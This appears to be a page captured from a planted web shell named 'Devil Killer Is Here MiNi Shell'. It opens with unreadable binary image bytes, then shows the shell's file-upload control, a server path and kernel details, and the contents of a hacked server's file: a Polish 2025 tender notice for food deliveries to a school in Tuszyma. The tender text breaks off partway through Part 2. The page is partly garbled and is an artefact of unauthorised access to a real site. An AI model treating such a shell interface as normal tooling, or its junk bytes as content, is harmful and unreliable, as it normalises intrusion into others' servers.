JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250721/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250721/0033567801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa artykułów żywnościowych (produktów spożywczych) do Zespołu Szkolno – Przedszkolnego w Tuszymie <br/>w roku szkolnym 2025 – 2026 – w podziale na 7 części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkolno-Przedszkolny w Tuszymie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 380840317</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Tuszyma 482</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tuszyma</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">39-321</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL824 - Tarnobrzeski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(17) 227 65 58</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">-</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zsptuszyma.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://zsptuszyma.edupage.org/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa artykułów żywnościowych (produktów spożywczych) do Zespołu Szkolno – Przedszkolnego w Tuszymie <br/>w roku szkolnym 2025 – 2026 – w podziale na 7 części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5d5d5ca3-38f5-4e0a-8187-d8c57c3f4a35</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00335678</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00335243/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Sukcesywna dostawa artykułów żywnościowych (produktów spożywczych) do Zespołu Szkolno – Przedszkolnego w Tuszymie w roku szkolnym 2025 – 2026 – w podziale na 7 części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5d5d5ca3-38f5-4e0a-8187-d8c57c3f4a35 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl/pl/<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia<br/>określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulaminserwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>4. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>sekretariat@zsptuszyma.pl (nie dotyczy składania ofert w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia,<br/>która jest dostępna pod adresem https://ezamowienia.gov.pl/pl/<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Zamawiający wyznacza następujące osoby do kontaktu z Wykonawcami:<br/>1) W zakresie związanym z przedmiotem zamówienia: Małgorzata Kozioł, tel. 17/227 65 59; <br/>email: sekretariat@zsptuszyma.pl ; <br/>2)	W zakresie związanym z realizacją procedury o udzielenie zamówienia: <br/>Anna Juwa tel. 17/227 65 58; <br/>Email: sekretariat@zsptuszyma.pl ;<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, o którym mowa w pkt 11.6 SWZ,<br/>przekazywane w postępowaniu sporządza się w postaci elektronicznej: a) w formatach danych określonych w przepisach<br/>rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (Zamawiający dopuszcza także format RAR)z<br/>uwzględnieniem rodzaju przekazywanych danych (i przekazuje się jako załącznik), lub b) jako tekst wpisany bezpośrednio do<br/>wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza<br/>do komunikacji”).<br/>6. Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania ofert opisano w rozdziale 13 SWZ) odbywa się<br/>drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do<br/>komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk „dodaj załącznik”).<br/>7. Ofertę składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym<br/>lub podpisem osobistym w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego<br/>2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (t.j. Dz. U. z 2024 r. poz. 1557), z zastrzeżeniem<br/>formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych. Zamawiający preferuje w<br/>szczególności następujące formaty przesłanych danych: .pdf, .docx, zip. Zamawiający dopuszcza także format RAR.<br/>8. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa § 12 Regulamin Platformy e-Zamówienia, a mianowicie:<br/>8.1. W celu prawidłowego korzystania z usług Platformy e-Zamówienia wymagany jest:<br/>a) Komputer PC:<br/>- parametry minimum: Intel Core2 Duo, 2 GB RAM, HD,<br/>- zainstalowany jeden z poniższych systemów operacyjnych: MS Windows 7 lub nowszy, OSX/Mac OS 10.10, Ubuntu 14.04,<br/>- zainstalowana jedna z poniższych przeglądarek: Chrome 66.0 lub nowsza, Firefox 59.0 lub nowszy, Safari 11.1 lub nowsza, Edge<br/>14.0 i nowsze, albo<br/>b) Tablet/Telefon:<br/>- parametry minimum: 4 rdzenie procesora, 2GB RAM, Android 6.0 Marshmallow, iOS 10.3,<br/>- przeglądarka Chrome 61 lub nowsza.<br/>8.2. Dla skorzystania z pełnej funkcjonalności może być konieczne włączenie w przeglądarce obsługi protokołu bezpiecznej<br/>transmisji danych SSL, obsługi Java Script, oraz cookies.<br/>Ze względu na ograniczoną ilość znaków, pozostałe zapisy znajdują się w Rozdziale 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) Jest administratorem danych osobowych Wykonawcy oraz osób, których dane Wykonawca przekazał w niniejszym postępowaniu;<br/>2) dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na zadanie „Sukcesywna dostawa artykułów żywnościowych (produktów spożywczych) do<br/>Zespołu Szkolno - Przedszkolnego w Tuszymie w roku szkolnym 2025 – 2026 – w podziale na 7 części ” prowadzonym<br/>w trybie podstawowym bez negocjacji;<br/>3) w sprawach dotyczących przetwarzania danych osobowych można kontaktować się z Inspektorem Ochrony Danych Osobowych<br/>poprzez emaila: spiecuch@przeclaw.org ,<br/>4) odbiorcami danych osobowych Wykonawcy będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych<br/>(t.j. Dz. U. z 2024 r. poz. 1320) dalej „ustawa Pzp”;<br/>5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.<br/>6) obowiązek podania przez Wykonawcę danych osobowych bezpośrednio go dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>7) w odniesieniu do danych osobowych Wykonawcy decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>8) Wykonawca posiada:<br/>na podstawie art. 15 RODO prawo dostępu do danych osobowych dotyczących Wykonawcy;<br/>na podstawie art. 16 RODO prawo do sprostowania danych osobowych, o ile ich zmiana nie skutkuje zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie narusza<br/>integralności protokołu oraz jego załączników;<br/>na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Wykonawca uzna, że przetwarzanie jego danych<br/>osobowych narusza przepisy RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">9) Wykonawcy nie przysługuje:<br/>w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>danych osobowych Wykonawcy jest art. 6 ust. 1 lit. c RODO.<br/>W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby<br/>niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji<br/>mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia<br/>publicznego lub konkursu.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa<br/>w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego lub<br/>konkursu ani zmianą postanowień umowy w zakresie niezgodnym z ustawą.<br/>Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">6/2025/ZSPT</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Artykuły spożywcze i inne produkty <br/>1.	Sok marchwiowo - owocowy ( różne smaki ) bez dodatku cukru	szt.	1000<br/>2.	Sok marchwiowo - owocowy ( różne smaki ) bez dodatku cukru	szt.	1000<br/>3.	Sok w kartoniku ze słomką szt.	800<br/>4.	Koncentrat pomidorowy 30% szt.	200<br/>5.	Ketchup łagodny szt.	60<br/>6.	Cukier biały kg	400<br/>7.	Dżem 100 % owoców bez konserwantów bez dodatku cukru, niskosłodzony ( różne smaki m.in. truskawka, wiśnia, brzoskwinia, czarna porzeczka	szt.	250<br/>8.	Powidła śliwkowe	szt.	35<br/>9.	Olej pierwsze tłoczenie omega-3 szt.	70<br/>10.	Woda źródlana niegazowana szt.	800<br/>11.	Oliwa z oliwek z pierwszego tłocz.	szt.	10<br/>12.	Cukier waniliowy torebka	szt.	10<br/>13.	Cukier puder	szt.	6<br/>14.	Proszek do pieczenia	szt.	15<br/>15.	Budyń bez dodatku cukru ( różne smaki )	szt.	80<br/>16.	Kisiel owocowy ( różne smaki )	szt.	80<br/>17.	Biszkopty okrągłe	szt.	50<br/>18.	Herbatniki szt.	26<br/>19.	Mace / podpłomyki szt.	10<br/>20.	Barszcz czerwony koncentrat szt.	10<br/>21.	Kakao	szt.	25<br/>22.	Kawa zbożowa typu Inka	szt.	25<br/>23.	Brzoskwinie w syropie połówki puszka	szt.	8<br/>24.	Ananas w syropie puszka	szt.	8<br/>25.	Kukurydza konserwowa złocista bez dodatku cukru puszka	szt.	5<br/>26.	Groszek konserwowy bez dodatku cukru puszka szt.	5<br/>27.	Filet z makreli w sosie pomidorowym puszka	szt.	60<br/>28.	Tuńczyk w oleju w kawałkach puszka	szt.	10<br/>29.	Chrzan tarty zawartość chrzanu w składzie min 70%	szt.	30<br/>30.	Barszcz Biały Brzeźnicki	szt.	130<br/>31.	Galaretka owocowa rózne smaki ( w proszku)	szt.	60<br/>32.	Żurawina suszona szt.	20<br/>33.	Morela suszona szt.	20<br/>34.	Rodzynki sułtańskie	szt.	20<br/>35.	Pestki dyni	szt.	15<br/>36.	Pestki słonecznika szt.	15<br/>37.	Galaretka owocowa w pojemiku (różne smaki)	szt.	400<br/>38.	Mus owocowy w tubce różne smaki bez dodatku cukru	szt.	1500<br/>39.	Czekolada gorzka szt.	200<br/>40.	Herbata ekspresowa min. 100 torebek w opakowaniu zbiorczym Lipton	op.	20<br/>41.	Herbata ekspresowa owocowa różne smaki	op.	15<br/>42.	Makaron typu kokardka duża świderek 5 jajeczny	szt.	200<br/>43.	Płatki jaglane błyskawiczne	szt.	10<br/>44.	Pieprz mielony czarny szt.	100<br/>45.	Majeranek szt.	20<br/>46.	Liść laurowy szt.	5<br/>47.	Ziele angielskie szt.	5<br/>48.	Oregano szt.	5<br/>49.	Lubczyk szt.	5<br/>50.	Zioła prowansalskie szt.	10<br/>51.	Suszone chipsy z jabłek - jabłko 100%	szt.	30<br/>52.	Majonez dekoracyjny szt.	50<br/>53.	Muszt.arda szt.	5<br/>54.	Bazylia suszona	szt.	90<br/>55.	Buraczki tarte w słoiku	szt.	150<br/>56.	Ciastko zbożowe	szt.	500<br/>57.	Cynamon mielony	szt.	5<br/>58.	Papryka mielona słodka szt.	80<br/>59.	Czosnek granulowany w proszku	szt.	80<br/>60.	Płatki śniadaniowe zbożowe o smaku czekoladowym	szt.	200<br/>61.	Płatki śniadaniowe kukurydziane	szt.	150<br/>62.	Płatki śniadaniowe zbożowe z miodem	szt.	100<br/>63.	Płatki śniadaniowe owsiane szt.	100<br/>64.	Makaron gwiazdki 5-jajeczny	szt.	60<br/>65.	Ogórki konserwowe łagodne	szt.	400<br/>66.	Ogórki kwaszone w słoiku łagodne	szt.	200<br/>67.	Mąka ziemniaczana	szt.	30<br/>68.	Ryż biały	kg	100<br/>69.	Ryż biały (torebki) op.	400<br/>70.	Mąka pszenna poznańska typ 500	szt.	150<br/>71.	Makaron ozdobny kolanko 5 jajeczny szt.	250<br/>72.	Płatki owsiane błyskawiczne szt.	26<br/>73.	Makaron muszelki drobne 5 jajeczny szt.	150<br/>74.	Kasza bulgur (torebka)	szt.	80<br/>75.	Kasza jęczmienna szt.	30<br/>76.	Kasza jaglana (torebka) op.	80<br/>77.	Kasza manna błyskawiczna	szt.	20<br/>78.	Kasza jęczmienna perłowa (torebka)	szt.	100<br/>79.	Wafle ryżowe zwykłe okrągłe	szt.	60<br/>80.	Ciasto francuskie szt.	15<br/>81.	Mus jabłkowy 100%	szt.	500<br/>82.	Drożdże świeże	szt.	12<br/>83.	Sól	szt.	160<br/>84.	Makaron łazanki 5 jajeczny	szt.	30<br/>85.	Makaron penne 5 jajeczny	szt.	180<br/>86.	Makaron spaghetti 5 jajeczny	szt.	300<br/>87.	Makaron zacierka 5 jajeczny	szt.	180<br/>88.	Makaron alfabet 5 jajeczny	szt.	150<br/>89.	Makaron ryżowy 5 jajeczny	szt.	80<br/>90.	Płatki ryżowe	szt.	80<br/>91.	Pasztet driobowy	szt.	100<br/>92.	Ocet 10%	szt.	6<br/>93.	Wafle tortowe	szt.	40<br/>94.	Kminek mielony	szt.	5<br/>95.	Pałeczki kukurydziane	szt.	60<br/>96.	Musli owocowe pełnoziarniste	szt.	30<br/>97.	Herbatniki	szt.	50<br/>98.	Woda źródlana niegazowana z dziubkiem do picia 330 ml	szt.	120<br/>99.	Fasola piękny Jaś 500g	szt.	15<br/>100.	Przyprawa korzenna do piernika	szt.	5<br/>101.	Kolendra liście	szt.	5<br/>102.	Rozmaryn mielony	szt.	5<br/>Dostawa 2 razy tygodniu (wtorek, piątek) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">100%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 - Mięso i wędliny<br/>1.	Mięso wieprzowe - schab świeży bez kości Jakość I	kg	50<br/>2.	Mięso wieprzowe - karkówka świeża bez 